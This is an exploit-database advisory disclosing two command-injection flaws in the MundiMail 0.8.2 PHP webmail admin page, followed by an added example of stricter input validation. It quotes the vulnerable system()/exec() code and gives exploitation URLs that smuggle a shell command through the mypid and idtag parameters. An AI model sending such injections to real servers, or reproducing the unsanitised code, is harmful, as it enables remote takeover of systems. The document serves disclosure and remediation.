
MundiMail 0.8.2 - Remote Code Execution

Author: Dedalo
type: webapps
platform: php
date_added: 2009-09-06 
date_updated: 2010-07-09 
verified: 1 
application_url: http://www.exploit-db.commundimail-0.8.2.tar.gz

# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs   - México - Coatepec, Ver.  www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, Centos & Windows Server 2000

Preview:

The code calls system() and exec() on request parameters without following good security practices.


1.- First Vulnerable Code

// need to kill daemon
$cmd = "/bin/kill";
$cmd .= " " . $_REQUEST["mypid"];
system($cmd);

2.- Exploitation

/admin/status/index.php?mypid=command;


3.- Fix


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
$cmd .= ' ' . $_REQUEST["idtag"];
$cmd .= ' > /dev/null';
$cmd .= ' &';
echo $cmd . "<br>\n";
exec($cmd);
$mid = "../mail/success.php";

5.- Exploitation

/admin/status/index.php?idtag=command;


6.- Fix

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);


7.- Other

Other types of fix can be used, but this is an easy one ;)
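
A stricter alternative to the escapeshellcmd() fixes in sections 3 and 6, added here as an example and not part of the original advisory or of MundiMail: escapeshellcmd() escapes shell metacharacters but leaves spaces alone, so a value can still contribute extra arguments. Validating mypid as digits and quoting idtag with escapeshellarg() closes that gap. The function names, the sample path and the assumed idtag format (letters, digits, underscore) are assumptions.

```php
<?php
// Added example, not MundiMail code. Function names and the idtag format are assumptions.

// Accept only a string of ASCII digits, so spaces, signs and shell metacharacters are rejected.
function validated_pid($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    $pid = (int) $raw;
    // 0 (the caller's process group) and 1 (init) are never a daemon to stop.
    return $pid > 1 ? $pid : null;
}

function build_kill_command($raw): ?string
{
    $pid = validated_pid($raw);
    return $pid === null ? null : '/bin/kill ' . $pid;
}

// Assumption: idtag is a short identifier made of letters, digits and underscores.
function build_massmail_command(string $rootdir, $raw): ?string
{
    if (!is_string($raw) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $raw)) {
        return null;
    }
    // escapeshellarg() quotes each value so the shell sees it as exactly one argument.
    return escapeshellarg($rootdir . 'include/massmail.php') . ' '
        . escapeshellarg($raw) . ' > /dev/null &';
}

// Constructed sample inputs: compare escapeshellcmd() alone with strict validation.
foreach (['4321', '4321 8765', '4321;x'] as $sample) {
    printf("%-12s escapeshellcmd=%-12s validated=%s\n",
        var_export($sample, true),
        var_export(escapeshellcmd($sample), true),
        var_export(build_kill_command($sample), true));
}
var_export(build_massmail_command('/opt/mundimail/', 'tag_17'));  // constructed path and id
echo "\n";
var_export(build_massmail_command('/opt/mundimail/', 'tag 17 extra'));
echo "\n";
```

The second sample shows the gap: escapeshellcmd() passes a space-separated value through unchanged, while the validated builder rejects it.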


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------